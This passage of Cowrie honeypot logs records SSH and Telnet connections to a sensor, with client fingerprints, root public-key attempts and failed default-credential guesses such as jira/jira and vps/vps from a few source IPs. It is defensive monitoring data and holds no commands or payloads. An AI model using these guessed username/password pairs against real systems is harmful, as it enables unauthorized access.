a-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.205794Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwMfqsxMsZ5D01HAoBlQnZXc8g+HSdcsVrVegrD0g1sA4NiGeXnhCr3SHD9uC2wxsAt6tpvjFu49f/0pwNC+7OgSdwdxjmUMSCSYpoQMXH+mqY1eYiJG13NvxbHZCRZYc6PwgpJ5+tuv/f3oqGiWL8a3zxpf5o1BBMLtW5J2bDeVvly+qcpz8/UZKRHyB0TXEd4CHUD6kJptE9X2lP1O7ZpFZjSCT1YHMyeeK30YgYfQRGRx++nueLmfwlLOQJPS0TMdUFcS5ZGhISIoqLWQXrh9evj6n7ehpn2S+geZ7cfPxqMpvV74pwd38A6Hg7rC1XYjWiaeZ2p6QmejGWGsucw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.253334Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwMfqsxMsZ5D01HAoBlQnZXc8g+HSdcsVrVegrD0g1sA4NiGeXnhCr3SHD9uC2wxsAt6tpvjFu49f/0pwNC+7OgSdwdxjmUMSCSYpoQMXH+mqY1eYiJG13NvxbHZCRZYc6PwgpJ5+tuv/f3oqGiWL8a3zxpf5o1BBMLtW5J2bDeVvly+qcpz8/UZKRHyB0TXEd4CHUD6kJptE9X2lP1O7ZpFZjSCT1YHMyeeK30YgYfQRGRx++nueLmfwlLOQJPS0TMdUFcS5ZGhISIoqLWQXrh9evj6n7ehpn2S+geZ7cfPxqMpvV74pwd38A6Hg7rC1XYjWiaeZ2p6QmejGWGsucw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.254036Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwMfqsxMsZ5D01HAoBlQnZXc8g+HSdcsVrVegrD0g1sA4NiGeXnhCr3SHD9uC2wxsAt6tpvjFu49f/0pwNC+7OgSdwdxjmUMSCSYpoQMXH+mqY1eYiJG13NvxbHZCRZYc6PwgpJ5+tuv/f3oqGiWL8a3zxpf5o1BBMLtW5J2bDeVvly+qcpz8/UZKRHyB0TXEd4CHUD6kJptE9X2lP1O7ZpFZjSCT1YHMyeeK30YgYfQRGRx++nueLmfwlLOQJPS0TMdUFcS5ZGhISIoqLWQXrh9evj6n7ehpn2S+geZ7cfPxqMpvV74pwd38A6Hg7rC1XYjWiaeZ2p6QmejGWGsucw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.272084Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:f5:7a:88:d2:ee:82:fb:b9:4d:67:2b:a4:6c:d2:1e","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwMfqsxMsZ5D01HAoBlQnZXc8g+HSdcsVrVegrD0g1sA4NiGeXnhCr3SHD9uC2wxsAt6tpvjFu49f/0pwNC+7OgSdwdxjmUMSCSYpoQMXH+mqY1eYiJG13NvxbHZCRZYc6PwgpJ5+tuv/f3oqGiWL8a3zxpf5o1BBMLtW5J2bDeVvly+qcpz8/UZKRHyB0TXEd4CHUD6kJptE9X2lP1O7ZpFZjSCT1YHMyeeK30YgYfQRGRx++nueLmfwlLOQJPS0TMdUFcS5ZGhISIoqLWQXrh9evj6n7ehpn2S+geZ7cfPxqMpvV74pwd38A6Hg7rC1XYjWiaeZ2p6QmejGWGsucw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.272748Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:14:53.188714Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60748,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b824a65c822","protocol":"ssh","message":"New connection: 196.251.86.249:60748 (1.2.3.4:22) [session: 9b824a65c822]","sensor":"my-vps","timestamp":"2025-08-26T09:15:29.363946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:15:29.857591Z","src_ip":"196.251.86.249","session":"9b824a65c822"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:15:29.859570Z","src_ip":"196.251.86.249","session":"9b824a65c822"}
{"eventid":"cowrie.login.failed","username":"jira","password":"jira","message":"login attempt [jira/jira] failed","sensor":"my-vps","timestamp":"2025-08-26T09:15:30.927594Z","src_ip":"196.251.86.249","session":"9b824a65c822"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:15:33.275502Z","src_ip":"196.251.86.249","session":"9b824a65c822"}
{"eventid":"cowrie.session.connect","src_ip":"123.176.141.31","src_port":39602,"dst_ip":"1.2.3.4","dst_port":23,"session":"b120505bd0f1","protocol":"telnet","message":"New connection: 123.176.141.31:39602 (1.2.3.4:23) [session: b120505bd0f1]","sensor":"my-vps","timestamp":"2025-08-26T09:15:35.887110Z"}
{"eventid":"cowrie.session.closed","duration":31.491809368133545,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:16:07.378844Z","src_ip":"123.176.141.31","session":"b120505bd0f1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38864,"dst_ip":"1.2.3.4","dst_port":22,"session":"67bc046a2e0f","protocol":"ssh","message":"New connection: 196.251.86.249:38864 (1.2.3.4:22) [session: 67bc046a2e0f]","sensor":"my-vps","timestamp":"2025-08-26T09:16:31.773329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:16:32.231788Z","src_ip":"196.251.86.249","session":"67bc046a2e0f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:16:32.233283Z","src_ip":"196.251.86.249","session":"67bc046a2e0f"}
{"eventid":"cowrie.login.failed","username":"vps","password":"vps","message":"login attempt [vps/vps] failed","sensor":"my-vps","timestamp":"2025-08-26T09:16:34.289453Z","src_ip":"196.251.86.249","session":"67bc046a2e0f"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:16:36.052578Z","src_ip":"196.251.86.249","session":"67bc046a2e0f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43888,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb770d60e3d7","protocol":"ssh","message":"New connection: 196.251.86.249:43888 (1.2.3.4:22) [session: fb770d60e3d7]","sensor":"my-vps","timestamp":"2025-08-26T09:17:33.934261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:17:34.638436Z","src_ip":"196.251.86.249","session":"fb770d60e3d7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:17:34.639166Z","src_ip":"196.251.86.249","session":"fb770d60e3d7"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-26T09:17:37.647354Z","src_ip":"196.251.86.249","session":"fb770d60e3d7"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:17:39.354000Z","src_ip":"196.251.86.249","session":"fb770d60e3d7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":47338,"dst_ip":"1.2.3.4","dst_port":22,"session":"25969846462e","protocol":"ssh","message":"New connection: 196.251.86.249:47338 (1.2.3.4:22) [session: 25969846462e]","sensor":"my-vps","timestamp":"2025-08-26T09:18:35.287796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:18:35.802779Z","src_ip":"196.251.86.249","session":"25969846462e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:18:35.803647Z","src_ip":"196.251.86.249","session":"25969846462e"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-26T09:18:37.767199Z","src_ip":"196.251.86.249","session":"25969846462e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:18:39.545643Z","src_ip":"196.251.86.249","session":"25969846462e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43179,"dst_ip":"1.2.3.4","dst_port":23,"session":"de4673036c83","protocol":"telnet","message":"New connection: 212.227.125.160:43179 (1.2.3.4:23) [session: de4673036c83]","sensor":"my-vps","timestamp":"2025-08-26T09:19:33.290830Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50558,"dst_ip":"1.2.3.4","dst_port":22,"session":"d138f9eba8a1","protocol":"ssh","message":"New connection: 196.251.86.249:50558 (1.2.3.4:22) [session: d138f9eba8a1]","sensor":"my-vps","timestamp":"2025-08-26T09:19:37.338171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:19:37.866730Z","src_ip":"196.251.86.249","session":"d138f9eba8a1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:19:37.867404Z","src_ip":"196.251.86.249","session":"d138f9eba8a1"}
{"eventid":"cowrie.login.failed","username":"zhouh","password":"zhouh","message":"login attempt [zhouh/zhouh] failed","sensor":"my-vps","timestamp":"2025-08-26T09:19:40.609992Z","src_ip":"196.251.86.249","session":"d138f9eba8a1"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:19:42.197807Z","src_ip":"196.251.86.249","session":"d138f9eba8a1"}
{"eventid":"cowrie.session.closed","duration":12.94188404083252,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:19:46.232640Z","src_ip":"212.227.125.160","session":"de4673036c83"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"87766422c717","protocol":"ssh","message":"New connection: 196.251.86.249:53380 (1.2.3.4:22) [session: 87766422c717]","sensor":"my-vps","timestamp":"2025-08-26T09:20:38.926777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:20:39.435416Z","src_ip":"196.251.86.249","session":"87766422c717"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:20:39.436352Z","src_ip":"196.251.86.249","session":"87766422c717"}
{"eventid":"cowrie.login.failed","username":"pul","password":"pul","message":"login attempt [pul/pul] failed","sensor":"my-vps","timestamp":"2025-08-26T09:20:42.216043Z","src_ip":"196.251.86.249","session":"87766422c717"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:20:43.771960Z","src_ip":"196.251.86.249","session":"87766422c717"}
{"eventid":"cowrie.session.connect","src_ip":"219.73.50.184","src_port":46624,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4cbb71e382f","protocol":"telnet","message":"New connection: 219.73.50.184:46624 (1.2.3.4:23) [session: d4cbb71e382f]","sensor":"my-vps","timestamp":"2025-08-26T09:20:55.765669Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.16.31.151","src_port":57312,"dst_ip":"1.2.3.4","dst_port":23,"session":"74cbe55c0ceb","protocol":"telnet","message":"New connection: 103.16.31.151:57312 (1.2.3.4:23) [session: 74cbe55c0ceb]","sensor":"my-vps","timestamp":"2025-08-26T09:21:03.413303Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61950,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d781e45df12","protocol":"ssh","message":"New connection: 217.72.205.35:61950 (1.2.3.4:22) [session: 3d781e45df12]","sensor":"my-vps","timestamp":"2025-08-26T09:21:03.453867Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:03.455079Z","src_ip":"217.72.205.35","session":"3d781e45df12"}
{"eventid":"cowrie.session.connect","src_ip":"122.116.160.242","src_port":35818,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ca6372b1ff4","protocol":"telnet","message":"New connection: 122.116.160.242:35818 (1.2.3.4:23) [session: 5ca6372b1ff4]","sensor":"my-vps","timestamp":"2025-08-26T09:21:05.902918Z"}
{"eventid":"cowrie.session.closed","duration":12.455283164978027,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:15.868513Z","src_ip":"103.16.31.151","session":"74cbe55c0ceb"}
{"eventid":"cowrie.session.connect","src_ip":"103.16.31.151","src_port":57248,"dst_ip":"1.2.3.4","dst_port":23,"session":"4af9fc457517","protocol":"telnet","message":"New connection: 103.16.31.151:57248 (1.2.3.4:23) [session: 4af9fc457517]","sensor":"my-vps","timestamp":"2025-08-26T09:21:16.163498Z"}
{"eventid":"cowrie.session.closed","duration":30.54760718345642,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:26.313178Z","src_ip":"219.73.50.184","session":"d4cbb71e382f"}
{"eventid":"cowrie.session.closed","duration":12.750376462936401,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:28.913805Z","src_ip":"103.16.31.151","session":"4af9fc457517"}
{"eventid":"cowrie.session.closed","duration":30.672642469406128,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:36.575469Z","src_ip":"122.116.160.242","session":"5ca6372b1ff4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56236,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d45dbeff4dc","protocol":"ssh","message":"New connection: 196.251.86.249:56236 (1.2.3.4:22) [session: 1d45dbeff4dc]","sensor":"my-vps","timestamp":"2025-08-26T09:21:40.949746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:21:41.764233Z","src_ip":"196.251.86.249","session":"1d45dbeff4dc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.c